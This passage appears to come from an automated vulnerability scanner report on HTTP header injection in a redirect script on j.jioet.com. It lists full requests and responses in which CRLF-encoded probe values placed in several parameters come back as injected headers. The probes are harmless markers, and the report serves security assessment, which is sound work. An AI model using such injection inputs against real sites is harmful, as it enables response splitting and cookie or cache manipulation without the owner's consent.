HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:46 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qcgqABU0AAG-5ZBk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:46 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:46 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk773110218044746465ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:46 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=9df03 6d42c08a398&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=773110218044746465&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1137
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the fc request parameter is copied into the Location response header. The payload 324fe%0d%0af3e39cf64e0 was submitted in the fc parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=324fe%0d%0af3e39cf64e0&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:19 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qkwqABU0AAEbtURk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:19 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:19 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk416110218044819625ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:19 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=324fe f3e39cf64e0&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=416110218044819625&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1138
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the ff request parameter is copied into the Location response header. The payload aa97d%0d%0abdd9024737e was submitted in the ff parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=aa97d%0d%0abdd9024737e&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:18 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qkgqABU0AAHBvVik; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:18 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:18 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk433110218044818412ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:18 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=aa97d bdd9024737e&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=433110218044818412&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1138
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the ft request parameter is copied into the Location response header. The payload fb7cd%0d%0adb9c0b1d9c4 was submitted in the ft parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=fb7cd%0d%0adb9c0b1d9c4&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:37 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qaQqABU0AAATvdq0; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:37 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:37 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk182110218044737313ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:37 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=fb7cd db9c0b1d9c4&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=182110218044737313&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1131
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the hidepriv request parameter is copied into the Location response header. The payload 7e042%0d%0ae45d4f30234 was submitted in the hidepriv parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=7e042%0d%0ae45d4f30234& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:49 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qsQqABU0AAG-VGJo; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:49 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:49 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk533110218044849667ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:49 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=7e042 e45d4f30234&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=533110218044849667&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1134
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
2.11. http://j.jioet.com/cgi/r [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://j.jioet.com
Path:
/cgi/r
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2fcc%0d%0a89eed5f8dfa was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true&&a2fcc%0d%0a89eed5f8dfa=1 HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:53 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qtQqABU0AAFuQIrw; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:53 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:53 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk144110218044853860ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:53 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&a2fcc 89eed5f8dfa=1&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=144110218044853860&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1145
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the qset request parameter is copied into the Location response header. The payload 165e5%0d%0ac319200ce11 was submitted in the qset parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=165e5%0d%0ac319200ce11&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:23 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qlwqABU0AAEag7Fk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:23 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:23 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk226110218044823403ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:23 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=165e5 c319200ce11&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=226110218044823403&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1128
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the sdw request parameter is copied into the Location response header. The payload a6faf%0d%0ad11408052f1 was submitted in the sdw parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=a6faf%0d%0ad11408052f1&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:32 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qoAqABU0AAATqg@Y; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:32 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:32 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk682110218044832619ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:32 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: 